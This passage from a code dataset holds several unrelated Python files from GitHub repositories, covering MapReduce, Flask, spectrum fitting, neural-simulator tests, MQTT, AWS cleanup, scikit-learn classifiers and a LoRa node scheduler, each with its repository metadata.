MRStep\n''' \npython 02_score_distribution.py test.txt\npython 02_score_distribution.py prep_reviews.csv\n'''\n\nclass MRFood(MRJob):\n\n def mapper(self,_,line):\n (Id,ProductId,UserId,ProfileName,HelpfulnessNumerator,HelpfulnessDenominator,\n Score,Time,Summary,Text)= line.split('\\t')\n yield Score,1\n\n\n def reducer(self,key,values):\n\n yield key, sum(values)\n\nif __name__=='__main__':\n MRFood.run()","repo_name":"Filip-231/Big-data-hadoop-map-reduce","sub_path":"06_food_reviews/02_score_distribution.py","file_name":"02_score_distribution.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10884653502","text":"import os\n\nfrom datetime import datetime\nfrom dotenv import load_dotenv\nfrom flask import jsonify, request\nfrom project import app\n\nfrom .effector import Effector\nfrom .utils import write_log\n\neffector = None\ndevice, curent_status = None, None\nload_dotenv()\nadaptation_status = False\n\n\n@app.route(\"/index\", methods=[\"GET\"])\ndef index():\n return jsonify({\"msg\": \"ok\"})\n\n\n@app.route(\"/configure\", methods=[\"POST\"])\ndef configure():\n global effector\n effector = Effector(request.json[\"strategies\"])\n return jsonify(\"Effector Configured\")\n\n\n@app.route(\"/adapt\", methods=[\"GET\"])\ndef adapt():\n global effector, device, current_status, adaptation_status, result\n\n scenario = request.args.get(\"scenario\")\n adapt_type = request.args.get(\"adapt_type\")\n\n write_log(f\"Adapting {adapt_type} for {scenario}.\")\n\n print(f\"ADAPT: {scenario} - {adapt_type}\")\n results = effector.adapt(scenario, adapt_type)\n count_fail = 0\n for result in results:\n if result[1] == \"fail\":\n count_fail += 1\n if count_fail > 0:\n return jsonify(\"Effector Failed\"), 400\n\n adaptation_status = True\n return jsonify(\"Effector Successful\"), 200\n\n\n@app.route(\"/return_to_previous\", methods=[\"GET\"])\ndef return_to_previous_state():\n global effector, device, current_status\n\n responses = []\n for result in results:\n if result[1] != \"fail\":\n write_log(f\"Returning {result[0]} to {result[1]}...\\n\")\n responses.append(effector.execute(result[0], result[1]))\n\n return jsonify(responses)\n","repo_name":"Adrilene/envaiot","sub_path":"Effector/project/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30576618335","text":"\"\"\" This module contain functions implementing the Pseudo-Voigt fit in lmfit.\nNone of these functions should be called directly by users - these functions are called from\nmethods in spectrum_fitting.\n\"\"\"\n\nfrom typing import List, Tuple, TYPE_CHECKING\n\nimport lmfit\nimport numpy as np\n\nif TYPE_CHECKING:\n from spectrum_fitting import PeakParams, MaximumParams\n\n\ndef do_pv_fit(peak_data: np.ndarray, peak_param: \"PeakParams\") -> lmfit.model.ModelResult:\n \"\"\"Pseudo-Voigt fit to the lattice plane peak intensity.\n\n :param peak_data: The data to be fitted, two theta values (x-data) in column 0 and intensity\n (y-data) in column 1.\n :param peak_param: A PeakParams object describing the peak to be fitted.\n \"\"\"\n model = None\n num_maxima = len(peak_param.maxima)\n\n # Add one peak to the model for each maximum\n for maxima_num in range(num_maxima):\n prefix = f\"maximum_{maxima_num}_\"\n if model:\n model += lmfit.models.PseudoVoigtModel(prefix=prefix)\n else:\n model = lmfit.models.PseudoVoigtModel(prefix=prefix)\n model += lmfit.Model(lambda x, background: background)\n\n two_theta = peak_data[:, 0]\n intensity = peak_data[:, 1]\n\n new_fit_parameters = guess_params(model, peak_param.previous_fit_parameters, two_theta,\n intensity, peak_param.maxima)\n # We can't use special characters in param names so have to save the user provided\n # name in user_data.\n for parameter in new_fit_parameters:\n if parameter != \"background\":\n parameter_num = int(parameter.split(\"_\")[1])\n new_fit_parameters[parameter].user_data = peak_param.maxima[parameter_num].name\n\n fit_result = model.fit(intensity, new_fit_parameters, x=two_theta)\n\n return fit_result\n\n\ndef guess_params(model: lmfit.Model, old_fit_params: lmfit.Parameters,\n x_data: np.ndarray, y_data: np.ndarray,\n maxima_params: List[\"MaximumParams\"]) -> lmfit.Parameters:\n \"\"\"Given a dataset and some information about where the maxima are, guess some good initial\n values for the Pseudo-Voigt fit.\n\n :param model: The lmfit Model to guess the params for.\n :param old_fit_params: Any params that are to be passed on from a previous fit\n :param x_data: The x data to be fitted.\n :param y_data: The y data to be fitted.\n :param maxima_params: The MaximaParams specified by the user.\n \"\"\"\n # This generates the derived parameters as well as the fundamental parameters\n new_fit_parameters = model.make_params()\n # We then overwrite some of the params to add a good initial guess.\n for index, maximum in enumerate(maxima_params):\n prefix = f\"maximum_{index}\"\n # If the params have been passed on then use them\n if old_fit_params and f\"{prefix}_center\" in old_fit_params:\n new_fit_parameters[f\"{prefix}_center\"] = old_fit_params[f\"{prefix}_center\"]\n new_fit_parameters[f\"{prefix}_sigma\"] = old_fit_params[f\"{prefix}_sigma\"]\n new_fit_parameters[f\"{prefix}_fraction\"] = old_fit_params[f\"{prefix}_fraction\"]\n new_fit_parameters[f\"{prefix}_amplitude\"] = old_fit_params[f\"{prefix}_amplitude\"]\n # If params haven't been passed on then guess new ones\n else:\n maximum_mask = np.logical_and(x_data > maximum.bounds[0], x_data < maximum.bounds[1])\n maxima_x = x_data[maximum_mask]\n maxima_y = y_data[maximum_mask]\n center = maxima_x[np.argmax(maxima_y)]\n\n max_sigma, min_sigma, sigma = guess_sigma(x_data, maximum.bounds)\n # When calculating amplitude take the maximum height of the peak but the minimum height\n # of the dataset overall. This is because the maximum_mask does not necessarily\n # include baseline points and we need the noise level.\n amplitude = (max(maxima_y) - min(y_data)) * 2 * sigma\n new_fit_parameters.add(f\"{prefix}_center\", value=center, min=maximum.bounds[0],\n max=maximum.bounds[1])\n new_fit_parameters.add(f\"{prefix}_sigma\", value=sigma, min=min_sigma, max=max_sigma)\n new_fit_parameters.add(f\"{prefix}_fraction\", value=0.2, min=0, max=1)\n new_fit_parameters.add(f\"{prefix}_amplitude\", value=amplitude, min=0)\n\n if old_fit_params and \"background\" in old_fit_params:\n new_fit_parameters[\"background\"] = old_fit_params[\"background\"]\n else:\n # Background should be > 0, but a little flexibility here improves fit convergence.\n new_fit_parameters.add(\"background\", value=min(y_data), min=-10, max=max(y_data))\n return new_fit_parameters\n\n\ndef guess_sigma(x_data: np.ndarray,\n maximum_range: Tuple[float, float]) -> Tuple[float, float, float]:\n \"\"\"Guess an initial value of sigma for the Pseudo-Voigt fit.\n\n :param x_data: The x_data to be fitted.\n :param maximum_range: Two floats indicating the range of values that the maximum falls within.\n :return: A maximum possible value for sigma, a minimum possible value and the initial guess\n of sigma.\n \"\"\"\n\n # By definition in the PV fit, sigma is half the width of the peak at FHWM.\n # In the case of a single peak, the maximum range is set to the peak bounds\n # In the case of multiplet peaks the maximum range is set approximately at the\n # FWHM either side of the peak.\n x_range = max(x_data) - min(x_data)\n maximum_range = maximum_range[1] - maximum_range[0]\n\n if maximum_range > 0.8 * x_range:\n # If the maximum range is similar to the x_range then we have a single peak. Make\n # assumptions based on data width\n # Sigma is approximately 7% of the peak_bounds\n sigma = 0.07 * x_range\n # The minimum sigma is approximately 2.5% of the peak bounds\n min_sigma = 0.025 * x_range\n # The maximum sigma is approximately 20% of the peak bounds\n max_sigma = 0.20 * x_range\n\n else:\n # We are dealing with multiple peaks - set sigma to be close to the maxima range\n sigma = 0.5 * maximum_range\n min_sigma = 0.1 * maximum_range\n max_sigma = 4 * maximum_range\n\n return max_sigma, min_sigma, sigma\n","repo_name":"LightForm-group/xrdfit","sub_path":"xrdfit/pv_fit.py","file_name":"pv_fit.py","file_ext":"py","file_size_in_byte":6245,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"36824431164","text":"import builtins\n\nimport pytest\n\nfrom brian2.utils.environment import running_from_ipython\nfrom brian2.utils.stringtools import SpellChecker\n\n\n@pytest.mark.codegen_independent\ndef test_environment():\n \"\"\"\n Test information about the environment we are running under.\n \"\"\"\n if hasattr(builtins, \"__IPYTHON__\"):\n testing_under_ipython = True\n del builtins.__IPYTHON__\n else:\n testing_under_ipython = False\n\n assert not running_from_ipython()\n builtins.__IPYTHON__ = True\n assert running_from_ipython()\n\n if not testing_under_ipython:\n del builtins.__IPYTHON__\n\n\n@pytest.mark.codegen_independent\ndef test_spell_check():\n checker = SpellChecker([\"vm\", \"alpha\", \"beta\"])\n assert checker.suggest(\"Vm\") == {\"vm\"}\n assert checker.suggest(\"alphas\") == {\"alpha\"}\n assert checker.suggest(\"bta\") == {\"beta\"}\n assert checker.suggest(\"gamma\") == set()\n\n\nif __name__ == \"__main__\":\n test_environment()\n test_spell_check()\n","repo_name":"brian-team/brian2","sub_path":"brian2/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":823,"dataset":"github-code","pt":"61"} +{"seq_id":"23616315961","text":"import sys\r\n\r\nf = open(sys.argv[1], 'r')\r\nlines = f.readlines()\r\nlines.pop(0)\r\nf.close()\r\n\r\nf = open('asdf.txt', 'w')\r\nc = 0\r\n\r\ndef format(list):\r\n\treturn str(list).replace(\"'\", '')\r\n\r\nfor l in lines:\r\n\tc+=1\r\n\tl = l.split()\r\n\topposed = 0\r\n\tform = 0\r\n\tif l[0] == '0':\r\n\t\tnext = 1\r\n\telif l[0] == '1':\r\n\t\tform = list(l[1][:2])\r\n\t\tnew = l[1][2]\r\n\t\tnext = 2\r\n\tif l[next] == '0':\r\n\t\tnext += 2\r\n\telif l[next] == '1':\r\n\t\topposed = list(l[next+1][:2])\r\n\t\tnext += 3\r\n\t\r\n\tevoke = []\r\n\tfor e in l[next]:\r\n\t\tevoke.append(e)\r\n\t\tif form and len(evoke) >= 2 and (evoke[-2:] == [form[0], form[1]] or evoke[-2:] == [form[1], form[0]]):\r\n\t\t\tevoke.pop()\r\n\t\t\tevoke.pop()\r\n\t\t\tevoke.append(new)\r\n\t\telif opposed and opposed[0] in evoke and opposed[1] in evoke:\r\n\t\t\tevoke = []\r\n\t\r\n\tf.write('Case #' + str(c) + \": \" + format(evoke) + \"\\n\")\r\n\t\r\nf.close()\r\n\t\t","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_75/1085.py","file_name":"1085.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12731306154","text":"#!/usr/bin/env python3\n\nimport os\nimport pathlib\nimport sys\nimport warnings\nimport logging as log\n\n# import pyarrow as pa\n# import numpy as np\n# import astropy.units as u\n\nfrom astropy.wcs.wcs import FITSFixedWarning\nfrom argparse import ArgumentParser\nfrom swift_comet_pipeline.pipeline_files import PipelineFiles\nfrom swift_comet_pipeline.stacking import StackingMethod\n\nfrom swift_comet_pipeline.swift_data import SwiftData\nfrom swift_comet_pipeline.configs import read_swift_project_config\nfrom swift_comet_pipeline.observation_log import (\n build_observation_log,\n # observation_log_schema,\n write_observation_log,\n)\nfrom swift_comet_pipeline.swift_filter import SwiftFilter\n\n\ndef process_args():\n # Parse command-line arguments\n parser = ArgumentParser(\n usage=\"%(prog)s [options]\",\n description=__doc__,\n prog=os.path.basename(sys.argv[0]),\n )\n # parser.add_argument(\"--version\", action=\"version\", version=__version__)\n parser.add_argument(\n \"--verbose\", \"-v\", action=\"count\", default=0, help=\"increase verbosity level\"\n )\n parser.add_argument(\n \"swift_project_config\", nargs=1, help=\"Filename of project config\"\n )\n parser.add_argument(\n \"--output\",\n \"-o\",\n default=\"observation_log.parquet\",\n help=\"Filename of observation log output\",\n )\n\n args = parser.parse_args()\n\n # handle verbosity\n if args.verbose >= 2:\n log.basicConfig(format=\"%(levelname)s: %(message)s\", level=log.DEBUG)\n elif args.verbose == 1:\n log.basicConfig(format=\"%(levelname)s: %(message)s\", level=log.INFO)\n else:\n log.basicConfig(format=\"%(levelname)s: %(message)s\")\n\n return args\n\n\n# def bool_to_x_or_check(x: bool):\n# if x:\n# return \"✔\"\n# else:\n# return \"✗\"\n\n\ndef main():\n # we don't care about these particular warnings\n warnings.resetwarnings()\n warnings.filterwarnings(\"ignore\", category=FITSFixedWarning, append=True)\n\n args = process_args()\n\n swift_project_config_path = pathlib.Path(args.swift_project_config[0])\n swift_project_config = read_swift_project_config(swift_project_config_path)\n if swift_project_config is None:\n print(f\"Error reading config file {swift_project_config_path}, exiting.\")\n return 1\n\n pipeline_files = PipelineFiles(swift_project_config.product_save_path)\n\n print(\n pipeline_files.observation_log.product_path,\n bool_to_x_or_check(pipeline_files.observation_log.product_path.exists()),\n )\n print(\n pipeline_files.comet_orbital_data.product_path,\n bool_to_x_or_check(pipeline_files.comet_orbital_data.product_path.exists()),\n )\n print(\n pipeline_files.earth_orbital_data.product_path,\n bool_to_x_or_check(pipeline_files.earth_orbital_data.product_path.exists()),\n )\n\n if pipeline_files.epoch_products is None:\n print(\"No epochs defined yet!\")\n exit(0)\n\n # print(pipeline_files.epoch_file_paths)\n print(\"Epochs:\")\n for x in pipeline_files.epoch_products:\n print(x.product_path.stem)\n\n print(\"\")\n print(\"Stacked epochs and images:\")\n for x in pipeline_files.epoch_file_paths: # type: ignore\n ep_prod = pipeline_files.stacked_epoch_products[x] # type: ignore\n print(ep_prod.product_path, bool_to_x_or_check(x.exists()))\n uw1_sum = pipeline_files.stacked_image_products[ # type: ignore\n x, SwiftFilter.uw1, StackingMethod.summation\n ]\n print(\n f\"uw1 sum: {uw1_sum.product_path.stem}, {bool_to_x_or_check(uw1_sum.exists())}\"\n )\n if uw1_sum.exists():\n uw1_sum.load_product()\n print(\"Dimensions:\", uw1_sum.data_product.data.shape)\n\n bg_prod = pipeline_files.analysis_background_products[x] # type: ignore\n print(bg_prod.product_path, bool_to_x_or_check(bg_prod.exists()))\n if bg_prod.exists():\n bg_prod.load_product()\n print(bg_prod.data_product[\"method\"])\n\n uw1_bg_sub = pipeline_files.analysis_bg_subtracted_images[x, SwiftFilter.uw1, StackingMethod.summation] # type: ignore\n print(uw1_bg_sub.product_path, bool_to_x_or_check(uw1_bg_sub.exists()))\n if uw1_bg_sub.exists():\n uw1_bg_sub.load_product()\n print(\"Dimensions:\", uw1_bg_sub.data_product.data.shape)\n uvv_bg_sub = pipeline_files.analysis_bg_subtracted_images[x, SwiftFilter.uvv, StackingMethod.summation] # type: ignore\n print(uvv_bg_sub.product_path, bool_to_x_or_check(uvv_bg_sub.exists()))\n if uvv_bg_sub.exists():\n uvv_bg_sub.load_product()\n print(\"Dimensions:\", uvv_bg_sub.data_product.data.shape)\n\n q = pipeline_files.analysis_qh2o_products[x] # type: ignore\n print(q.product_path, bool_to_x_or_check(q.exists()))\n if q.exists():\n q.load_product()\n print(q.data_product.Q_H2O[0])\n\n print(\"\")\n\n # print(pipeline_files.stacked_image_product_dict)\n\n # horizons_id = swift_project_config.jpl_horizons_id\n # sdd = SwiftData(data_path=pathlib.Path(swift_project_config.swift_data_path))\n\n # df = build_observation_log(\n # swift_data=sdd,\n # obsids=sdd.get_all_observation_ids(),\n # horizons_id=horizons_id,\n # )\n\n # if df is None:\n # print(\n # \"Could not construct the observation log in memory, exiting without writing output.\"\n # )\n # return 1\n #\n # write_observation_log(df, pipeline_files.get_observation_log_path())\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"sjoset/swift_comet_pipeline","sub_path":"deprecated/50_pipeline_product_status.py","file_name":"50_pipeline_product_status.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5347412243","text":"import paho.mqtt.client as mqtt\nimport paho.mqtt.publish as publish\nimport time, random\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n client.subscribe(\"$SYS/#\")\n\n# Publishes every 5 second a random generated temperature between [-20; 40] to the MQTT Broker\ndef on_message(client, userdata, msg):\n #print(msg.topic+\" \"+str(msg.payload))\n temp = random.randint(-20, 40)\n publish.single(\"temperature\", temp, hostname=\"localhost\")\n time.sleep(5)\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"localhost\", 1883, 60)\n\n# Blocking call that processes network traffic, dispatches callbacks and\n# handles reconnecting.\n# Other loop*() functions are available that give a threaded interface and a\n# manual interface.\nclient.loop_forever()","repo_name":"BlackIceDection/BlackIceDetection","sub_path":"scripts/mqtt_example.py","file_name":"mqtt_example.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29987225753","text":"import boto3\nfrom botocore.exceptions import ClientError\n\nec2 = boto3.client('ec2')\ndef del_security(security):\n try:\n response = ec2.delete_security_group(GroupId=security)\n print('Security Group Deleted')\n except ClientError as e:\n print(e)\n\ndef del_key(key):\n response = ec2.delete_key_pair(KeyName=key)\n print(response)\n\ndef del_all(key,security):\n del_security(security)\n del_key(key)","repo_name":"SaumoB/aws","sub_path":"aws_on_error.py","file_name":"aws_on_error.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23617771251","text":"import sys\r\n\r\ndef match_opposites(result, c, c_opposites):\r\n for b in result:\r\n if b in c_opposites: return True\r\n\r\ndef do_magicka(s, reactions, opposites):\r\n result = []\r\n for c in s:\r\n if not result:\r\n result.append(c)\r\n continue\r\n \r\n react = result[-1] + c\r\n if react in reactions:\r\n result[-1] = reactions[react]\r\n elif match_opposites(result, c, opposites.get(c, {})):\r\n result = []\r\n else:\r\n result.append(c)\r\n \r\n return result\r\n\r\ndef main(input, output):\r\n cases_count = int(input.readline())\r\n for i in xrange(cases_count):\r\n case_id = i+1\r\n \r\n case = input.readline()\r\n case = iter(case.split())\r\n \r\n reactions = {}\r\n for j in xrange(int(case.next())):\r\n reaction = case.next()\r\n if len(reaction) != 3: raise ValueError()\r\n reactions[reaction[:2]] = reaction[2]\r\n reactions[reaction[:2][::-1]] = reaction[2]\r\n \r\n opposites = {}\r\n for j in xrange(int(case.next())):\r\n opps = case.next()\r\n if len(opps) != 2: raise ValueError()\r\n a, b = opps\r\n opposites.setdefault(a, {})[b] = True\r\n opposites.setdefault(b, {})[a] = True\r\n \r\n str_len = int(case.next())\r\n s = case.next()\r\n assert len(s) == str_len\r\n \r\n result = do_magicka(s, reactions, opposites)\r\n result = '[%s]' % ', '.join(result) \r\n \r\n print >> output, 'Case #%s: %s' % (case_id, result)\r\n\r\nif __name__ == '__main__':\r\n if '-q' in sys.argv:\r\n log = lambda msg: None\r\n sys.argv.remove('-q')\r\n if len(sys.argv) > 1:\r\n input_path = sys.argv[1]\r\n else:\r\n input_path = 'example.txt'\r\n with file(input_path) as input:\r\n main(input, sys.stdout)\r\n ","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_75/428.py","file_name":"428.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26818510797","text":"#!/bin/python\n\nfrom six import StringIO\nfrom scipy.io import arff\nfrom sklearn.tree import DecisionTreeClassifier, export_text, export_graphviz\nfrom IPython.display import Image\nfrom sklearn.metrics import accuracy_score, roc_curve, roc_auc_score, plot_confusion_matrix\nfrom sklearn.naive_bayes import CategoricalNB\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder\nfrom sklearn.model_selection import train_test_split\n\nimport pydotplus\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n# nya frankie\ndef frankie(target, names):\n return np.array(list(map(lambda x: np.where(names == x)[0][0], target)))\n\ndef extract_column(df, index):\n return df[df.columns[index]]\n\ndef build_labelencoders(df):\n arr = []\n for i in range(0, len(df.columns)):\n le = LabelEncoder()\n col = extract_column(df, i).unique()\n le.fit(col)\n arr.append(le)\n return arr\n\ndef build_onehotencoders(df):\n ohe1 = OneHotEncoder()\n ohe1.fit(df.iloc[:, :-1])\n ohe2 = OneHotEncoder()\n ohe2.fit(df.iloc[:, -1:])\n #print(ohe.transform(df)[:5, :])\n return ohe1, ohe2\n\ndef create_tree_using_labelencoders(df):\n les = build_labelencoders(df)\n res = []\n for i in range(0, len(df.columns)):\n col = df.iloc[:, i].values\n res.append(les[i].transform(col))\n res = pd.DataFrame(res)\n\n #print(res.transpose())\n #inverse_res = []\n #for i in range(0, len(df.columns)):\n #col = res.iloc[i, :].values\n #inverse_res.append(les[i].inverse_transform(col))\n #inverse_res = pd.DataFrame(inverse_res)\n #print(inverse_res.transpose())\n res = res.transpose()\n data = res.iloc[:,:-1]\n target = res.iloc[:,-1:]\n feature_names = list(df.columns[:-1])\n class_names = list(extract_column(df, -1).unique())\n return data, target, feature_names, class_names\n\ndef create_tree_using_onehotencoders(df):\n oheData, oheTarget = build_onehotencoders(df)\n res = pd.DataFrame(oheData.transform(df.iloc[:, :-1]).toarray())\n data = res.iloc[:, :-1]\n res = pd.DataFrame(oheTarget.transform(df.iloc[:, -1:]).toarray())\n target = res.iloc[:,-1:]\n feature_names = oheData.get_feature_names(list(df.columns[:-1]))[:-1]\n class_names = list(extract_column(df, -1).unique())\n return data, target, feature_names, class_names\n\ndef perform_bayes(df):\n les = build_labelencoders(df)\n res = []\n for i in range(len(df.columns)):\n col = df.iloc[:, i].values\n res.append(les[i].transform(col))\n res = pd.DataFrame(res).transpose()\n x = res.iloc[:, :-1]\n y = res.iloc[:, -1:]\n\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25, random_state=10)\n\n model = CategoricalNB()\n model.fit(x_train, y_train.values.ravel())\n\n y_pred = model.predict(x_test)\n y_pred_probability = model.predict_proba(x_test)[::, 1]\n\n accuracy = accuracy_score(y_test, y_pred) * 100\n print(accuracy)\n\n # example patient\n test = ['50-59','ge40','50-54','24-26','no','1','right','left_up','yes']\n print(test)\n\n # transform using labelencoders\n for i in range(len(test)):\n e = test[i]\n test[i] = les[i].transform(np.array(e).reshape(1, ))\n test = np.array(test)\n\n # do prediction\n y = model.predict(test.reshape(1, -1))\n\n # translate back\n y = les[-1].inverse_transform(y)[0]\n print(y)\n\n a, b, _ = roc_curve(y_test, y_pred_probability)\n area_under_curve = roc_auc_score(y_test, y_pred_probability)\n plt.plot(a, b, label=\"area under curve=\"+str(area_under_curve))\n plt.xlabel(\"false positive rate\")\n plt.ylabel(\"true positive rate\")\n plt.axis\n plt.legend(loc=4)\n plot_confusion_matrix(model, x_train, y_train.values.ravel(), normalize='true', display_labels=les[-1].inverse_transform([0, 1]))\n plt.show()\n\nfiledata = arff.loadarff('./breast-cancer.arff')\n\ndf = pd.DataFrame(filedata[0])\nfor i in range(0, len(df.columns)):\n title = list(df.columns)[i]\n df[title] = df[title].apply(lambda s: s.decode(\"utf-8\"))\n\n#data, target, feature_names, class_names = create_tree_using_labelencoders(df)\ndata, target, feature_names, class_names = create_tree_using_onehotencoders(df)\n\nx_train, x_test, y_train, y_test = train_test_split(data, target, train_size=0.25, random_state=10)\n\ndecision_tree = DecisionTreeClassifier(random_state=0, criterion=\"entropy\")\npath = decision_tree.cost_complexity_pruning_path(x_train, y_train)\nccp_alphas, impurities = path.ccp_alphas, path.impurities\n\nfig, ax = plt.subplots()\nax.plot(ccp_alphas[:-1], impurities[:-1], marker='o', drawstyle=\"steps-post\")\nax.set_xlabel(\"effective alpha\")\nax.set_ylabel(\"total impurity of leaves\")\nax.set_title(\"Total Impurity vs effective alpha for training set\")\n\nclfs = []\nfor ccp_alpha in ccp_alphas:\n clf = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)\n clf.fit(x_train, y_train)\n clfs.append(clf)\nprint(\"Number of nodes in the last tree is: {} with ccp_alpha: {}\".format(clfs[-1].tree_.node_count, ccp_alphas[-1]))\nclfs = clfs[:-1]\nccp_alphas = ccp_alphas[:-1]\n\nnode_counts = [clf.tree_.node_count for clf in clfs]\ndepth = [clf.tree_.max_depth for clf in clfs]\nfig, ax = plt.subplots(2, 1)\nax[0].plot(ccp_alphas, node_counts, marker='o', drawstyle=\"steps-post\")\nax[0].set_xlabel(\"alpha\")\nax[0].set_ylabel(\"number of nodes\")\nax[0].set_title(\"Number of nodes vs alpha\")\nax[1].plot(ccp_alphas, depth, marker='o', drawstyle=\"steps-post\")\nax[1].set_xlabel(\"alpha\")\nax[1].set_ylabel(\"depth of tree\")\nax[1].set_title(\"Depth vs alpha\")\nfig.tight_layout()\n\ntrain_scores = [clf.score(x_train, y_train) for clf in clfs]\ntest_scores = [clf.score(x_test, y_test) for clf in clfs]\n\nfig, ax = plt.subplots()\nax.set_xlabel(\"alpha\")\nax.set_ylabel(\"accuracy\")\nax.set_title(\"Accuracy vs alpha for training and testing sets\")\nax.plot(ccp_alphas, train_scores, marker='o', label=\"train\",\n drawstyle=\"steps-post\")\nax.plot(ccp_alphas, test_scores, marker='o', label=\"test\",\n drawstyle=\"steps-post\")\nax.legend()\n\nplt.show()\n\ndecision_tree = decision_tree.fit(x_train, y_train)\n\nplot_confusion_matrix(decision_tree, x_test, y_test.values.ravel(), display_labels=class_names)\nplt.show()\n\n#r = export_text(decision_tree, feature_names)\n#print(r)\n\ndot_data = StringIO()\n\nexport_graphviz(decision_tree, \n out_file=dot_data,\n filled=True,\n rounded=True,\n special_characters=True,\n feature_names=feature_names,\n class_names=class_names)\n\ngraph = pydotplus.graph_from_dot_data(dot_data.getvalue())\ngraph.write_png(\"big_tree.png\")\nImage(graph.create_png())\n\n\n# extracted from graph\n\"\"\"\ndecision_tree.ccp_alpha = 0.04\ndecision_tree = decision_tree.fit(x_train, y_train)\n\ndot_data = StringIO()\n\nexport_graphviz(decision_tree, \n out_file=dot_data,\n filled=True,\n rounded=True,\n special_characters=True,\n feature_names=feature_names,\n class_names=class_names)\n\ngraph = pydotplus.graph_from_dot_data(dot_data.getvalue())\ngraph.write_png(\"not_asbig_tree.png\")\nImage(graph.create_png())\n\"\"\"\n\n#perform_bayes(df)\n","repo_name":"atemmel/datamining","sub_path":"lab2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72905982593","text":"# implementation of Light algorithm (node side)\n# \"Offline scheduling algorithms for time-slotted lora-based bulk data transmission\"\n# author: Dimitris Zorbas (dimzorbas@ieee.org)\n#\n# Distributed under GNU GPLv3\n\nimport os\nimport socket\nimport time\nimport struct\nfrom network import LoRa\nimport pycom\nimport machine\nimport ubinascii\nfrom network import WLAN\nfrom network import Bluetooth\nfrom network import Server\nfrom pytrack import Pytrack\nimport uos\nfrom machine import Timer\nimport math\n\nwlan = WLAN()\nwlan.deinit()\nbt = Bluetooth()\nbt.deinit()\nserver = Server()\nserver.deinit()\npy = Pytrack()\nANSELC_ADDR = const(0x18E)\npy.poke_memory(ANSELC_ADDR, ~(1 << 7))\n\n_LORA_PKG_FORMAT = \"!BB%ds\"\n_LORA_RCV_PKG_FORMAT = \"!BB%ds\"\nMY_ID = 0x0B\n(my_sf, my_bw_index, my_slot, guard, sync_rate) = (7, 2, 0, 40, 1) # default values\nfreqs = [865000000, 865600000, 866200000, 866800000, 867400000, 868000000] # my channels\n# airtimes for 100-byte packets and 8 preamble symbols\nairtime = [[0.174336, 0.087168, 0.043584], [0.307712, 0.153856, 0.076928], [0.553984, 0.276992, 0.138496], [1.026048, 0.513024, 0.256512], [2.215936, 0.944128, 0.472064], [3.940352, 1.724416, 0.862208]]\nif (my_bw_index == 0):\n my_bw = LoRa.BW_125KHZ\nelif (my_bw_index == 1):\n my_bw = LoRa.BW_250KHZ\nelse:\n my_bw = LoRa.BW_500KHZ\n\npycom.heartbeat(False)\noff = 0x000000\nred = 0xFF0000\ngreen = 0x00FF00\nblue = 0x0000FF\nwhite = 0xFFFAFA\nlight_green = 0x7CFC00\n\nwhile (True): # run multiple tests\n pycom.rgbled(green)\n lora = LoRa(mode=LoRa.LORA, rx_iq=True, region=LoRa.EU868, frequency=freqs[0], power_mode=LoRa.ALWAYS_ON, bandwidth=my_bw, sf=12)\n lora_sock = socket.socket(socket.AF_LORA, socket.SOCK_RAW)\n lora_sock.setblocking(False)\n rec = 0\n while (rec == 0):\n recv_pkg = lora_sock.recv(4096)\n if (len(recv_pkg) > 2):\n recv_pkg_len = recv_pkg[1]\n recv_pkg_id = recv_pkg[0]\n print(str(recv_pkg))\n if (int(recv_pkg_id) == 1):\n dev_id, leng, data = struct.unpack(_LORA_RCV_PKG_FORMAT % recv_pkg_len, recv_pkg)\n print('Device: %d - Pkg: %s' % (dev_id, data))\n data = str(data)[2:]\n data = data[:-1]\n if \":\" in str(data): # schedule: guard:sync_rate:id1 sf slot,id2 sf slot,...\n pycom.rgbled(red)\n (guard, sync_rate, data) = str(data).split(\":\")\n guard = int(guard)\n sync_rate = int(sync_rate)\n nodes = str(data).split(\",\")\n print(nodes)\n for n in nodes:\n (id, sf, slot) = str(n).split(\" \")\n if (int(id) == int(MY_ID)):\n my_sf = int(sf)\n my_slot = int(slot)\n print(\"guard = \", guard, \"sf = \", my_sf, \"slot = \", my_slot)\n print(\"waiting for sync command\")\n elif (str(data) == \"init\"): # data collection initialisation\n print(\"init received!\")\n pycom.rgbled(blue)\n rec = 1\n lora.init(power_mode=LoRa.SLEEP)\n chrono = Timer.Chrono()\n chrono.start()\n\n msg = \"11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\" # just a 98-byte message\n 